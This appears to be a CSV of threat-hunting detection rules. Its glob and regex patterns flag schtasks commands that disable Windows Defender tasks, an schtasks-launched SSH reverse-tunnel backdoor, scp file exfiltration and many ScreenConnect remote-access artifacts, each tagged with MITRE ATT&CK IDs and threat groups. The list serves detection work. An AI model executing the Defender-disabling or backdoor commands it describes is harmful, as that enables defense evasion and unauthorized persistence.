"*schtasks /Change /TN ""Microsoft\Windows\Windows Defender\Windows Defender Cleanup"" /Disable*",".{0,1000}schtasks\s\/Change\s\/TN\s\""Microsoft\\Windows\\Windows\sDefender\\Windows\sDefender\sCleanup\""\s\/Disable.{0,1000}","greyware_tool_keyword","schtasks","disable scheduled tasks related to Windows Defender","T1562.001","TA0005","N/A","APT3 - Kimsuky - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*schtasks /Change /TN ""Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan"" /Disable*",".{0,1000}schtasks\s\/Change\s\/TN\s\""Microsoft\\Windows\\Windows\sDefender\\Windows\sDefender\sScheduled\sScan\""\s\/Disable.{0,1000}","greyware_tool_keyword","schtasks","disable scheduled tasks related to Windows Defender","T1562.001","TA0005","N/A","APT3 - Kimsuky - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*schtasks /Change /TN ""Microsoft\Windows\Windows Defender\Windows Defender Verification"" /Disable*",".{0,1000}schtasks\s\/Change\s\/TN\s\""Microsoft\\Windows\\Windows\sDefender\\Windows\sDefender\sVerification\""\s\/Disable.{0,1000}","greyware_tool_keyword","schtasks","disable scheduled tasks related to Windows Defender","T1562.001","TA0005","N/A","APT3 - Kimsuky - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*schtasks /query /v /fo LIST*",".{0,1000}schtasks\s\/query\s\/v\s\/fo\sLIST.{0,1000}","greyware_tool_keyword","schtasks","view detailed information about all the scheduled tasks.","T1053.005 - T1082","TA0004 - TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*schtasks.exe /create /sc * /tr ""%programdata%\sshd\sshd.exe -f %programdata%\sshd\config\sshd_config\keys\id_rsa -N -R * -o StrictHostKeyChecking=no -o *",".{0,1000}schtasks\.exe\s\/create\s\/sc\s.{0,1000}\s\/tr\s\""\%programdata\%\\sshd\\sshd\.exe\s\-f\s\%programdata\%\\sshd\\config\\sshd_config\\keys\\id_rsa\s\-N\s\-R\s.{0,1000}\s\-o\sStrictHostKeyChecking\=no\s\-o\s.{0,1000}","greyware_tool_keyword","schtasks","SSH backdoor creation with schtasks","","TA0003 - TA0011","N/A","N/A","Persistence","https://www.trellix.com/blogs/research/cactus-ransomware-new-strain-in-the-market/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*schtasks.exe /create /sc minute /mo 1 /tn * /rl highest /np /tr *\sshd\sshd.exe -f *\sshd\config\sshd_config*",".{0,1000}schtasks\.exe\s\/create\s\/sc\sminute\s\/mo\s1\s\/tn\s.{0,1000}\s\/rl\shighest\s\/np\s\/tr\s.{0,1000}\\sshd\\sshd\.exe\s\-f\s.{0,1000}\\sshd\\config\\sshd_config.{0,1000}","greyware_tool_keyword","schtasks","SSH backdoor creation with schtasks","","TA0003 - TA0011","N/A","N/A","Persistence","https://www.trellix.com/blogs/research/cactus-ransomware-new-strain-in-the-market/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*scp * *@*:*",".{0,1000}scp\s.{0,1000}\s.{0,1000}\@.{0,1000}\:.{0,1000}","greyware_tool_keyword","scp","Detects the use of tools that copy files from or to remote systems","T1041 - T1105 - T1106","TA0002 - TA0008 - TA0010","N/A","N/A","Data Exfiltration","https://attack.mitre.org/techniques/T1105/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*scp *@*:* *",".{0,1000}scp\s.{0,1000}\@.{0,1000}\:.{0,1000}\s.{0,1000}","greyware_tool_keyword","scp","Detects the use of tools that copy files from or to remote systems","T1041 - T1105 - T1106","TA0002 - TA0008 - TA0010","N/A","N/A","Data Exfiltration","https://attack.mitre.org/techniques/T1105/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*:8040/SetupWizard.aspx*",".{0,1000}\:8040\/SetupWizard\.aspx.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\CurrentControlSet\Control\SafeBoot\Network\ScreenConnect Client (*",".{0,1000}\\CurrentControlSet\\Control\\SafeBoot\\Network\\ScreenConnect\sClient\s\(.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\CurrentControlSet\Services\ScreenConnect *",".{0,1000}\\CurrentControlSet\\Services\\ScreenConnect\s.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Documents\ConnectWiseControl\Files*",".{0,1000}\\Documents\\ConnectWiseControl\\Files.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\InventoryApplicationFile\screenconnect.cl*",".{0,1000}\\InventoryApplicationFile\\screenconnect\.cl.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\InventoryApplicationFile\screenconnect.wi*",".{0,1000}\\InventoryApplicationFile\\screenconnect\.wi.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ScreenConnect Client (*",".{0,1000}\\ScreenConnect\sClient\s\(.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","#companyname","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ScreenConnect.Client.exe*",".{0,1000}\\ScreenConnect\.Client\.exe.{0,1000}","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","screenconnect.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ScreenConnect.ClientService.exe*",".{0,1000}\\ScreenConnect\.ClientService\.exe.{0,1000}","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ScreenConnect.ClientSetup.exe*",".{0,1000}\\ScreenConnect\.ClientSetup\.exe.{0,1000}","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ScreenConnect.Core.dll*",".{0,1000}\\ScreenConnect\.Core\.dll.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ScreenConnect.InstallerActions.dll*",".{0,1000}\\ScreenConnect\.InstallerActions\.dll.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ScreenConnect.Windows.dll*",".{0,1000}\\ScreenConnect\.Windows\.dll.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ScreenConnect.WindowsBackstageShell.exe*",".{0,1000}\\ScreenConnect\.WindowsBackstageShell\.exe.{0,1000}","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ScreenConnect.WindowsClient.exe*",".{0,1000}\\ScreenConnect\.WindowsClient\.exe.{0,1000}","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ScreenConnect\Bin\*",".{0,1000}\\ScreenConnect\\Bin\\.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\TEMP\ScreenConnect\*.ps1*",".{0,1000}\\TEMP\\ScreenConnect\\.{0,1000}\.ps1.{0,1000}","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","screenconnect.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Temp\ScreenConnect\*\setup.msi*",".{0,1000}\\Temp\\ScreenConnect\\.{0,1000}\\setup\.msi.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Windows\Temp\ScreenConnect\*.cmd*",".{0,1000}\\Windows\\Temp\\ScreenConnect\\.{0,1000}\.cmd.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Windows\Temp\ScreenConnect\*.ps1*",".{0,1000}\\Windows\\Temp\\ScreenConnect\\.{0,1000}\.ps1.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*<Data>ScreenConnect Software</Data>*",".{0,1000}\<Data\>ScreenConnect\sSoftware\<\/Data\>.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*<Provider Name='ScreenConnect Security Manager'/>*",".{0,1000}\<Provider\sName\=\'ScreenConnect\sSecurity\sManager\'\/\>.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*<Provider Name='ScreenConnect Web Server'/>*",".{0,1000}\<Provider\sName\=\'ScreenConnect\sWeb\sServer\'\/\>.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*cmd.exe*\TEMP\ScreenConnect\*.cmd*",".{0,1000}cmd\.exe.{0,1000}\\TEMP\\ScreenConnect\\.{0,1000}\.cmd.{0,1000}","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","screenconnect.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://*.screenconnect.com/Bin/*.exe*",".{0,1000}https\:\/\/.{0,1000}\.screenconnect\.com\/Bin\/.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","screenconnect.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://*.screenconnect.com/Host*",".{0,1000}https\:\/\/.{0,1000}\.screenconnect\.com\/Host.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://cloud.screenconnect.com/#/trialtoinstance?cookieValue=*",".{0,1000}https\:\/\/cloud\.screenconnect\.com\/\#\/trialtoinstance\?cookieValue\=.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Program Files (x86)\ScreenConnect Client*",".{0,1000}Program\sFiles\s\(x86\)\\ScreenConnect\sClient.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*-relay.screenconnect.com*",".{0,1000}\-relay\.screenconnect\.com.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ScreenConnect Software*",".{0,1000}ScreenConnect\sSoftware.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ScreenConnect.Client.dll*",".{0,1000}ScreenConnect\.Client\.dll.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ScreenConnect.Client.exe.jar*",".{0,1000}ScreenConnect\.Client\.exe\.jar.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ScreenConnect.ClientService.dll*",".{0,1000}ScreenConnect\.ClientService\.dll.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ScreenConnect.ClientService.exe*",".{0,1000}ScreenConnect\.ClientService\.exe.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ScreenConnect.ClientSetup.exe*",".{0,1000}ScreenConnect\.ClientSetup\.exe.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SCREENCONNECT.CLIENTSETUP.EXE-*.pf*",".{0,1000}SCREENCONNECT\.CLIENTSETUP\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ScreenConnect.ClientUninstall.vbs*",".{0,1000}ScreenConnect\.ClientUninstall\.vbs.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ScreenConnect.Core.pdb*",".{0,1000}ScreenConnect\.Core\.pdb.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ScreenConnect.Server.dll*",".{0,1000}ScreenConnect\.Server\.dll.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ScreenConnect.Service.exe*",".{0,1000}ScreenConnect\.Service\.exe.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SCREENCONNECT.SERVICE.EXE-*.pf*",".{0,1000}SCREENCONNECT\.SERVICE\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ScreenConnect.WindowsBackstageShell.exe*",".{0,1000}ScreenConnect\.WindowsBackstageShell\.exe.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SCREENCONNECT.WINDOWSCLIENT.*.pf*",".{0,1000}SCREENCONNECT\.WINDOWSCLIENT\..{0,1000}\.pf.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ScreenConnect.WindowsClient.exe*",".{0,1000}ScreenConnect\.WindowsClient\.exe.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ScreenConnect.WindowsInstaller.dll*",".{0,1000}ScreenConnect\.WindowsInstaller\.dll.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ScreenConnect_*_Release.msi*",".{0,1000}ScreenConnect_.{0,1000}_Release\.msi.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
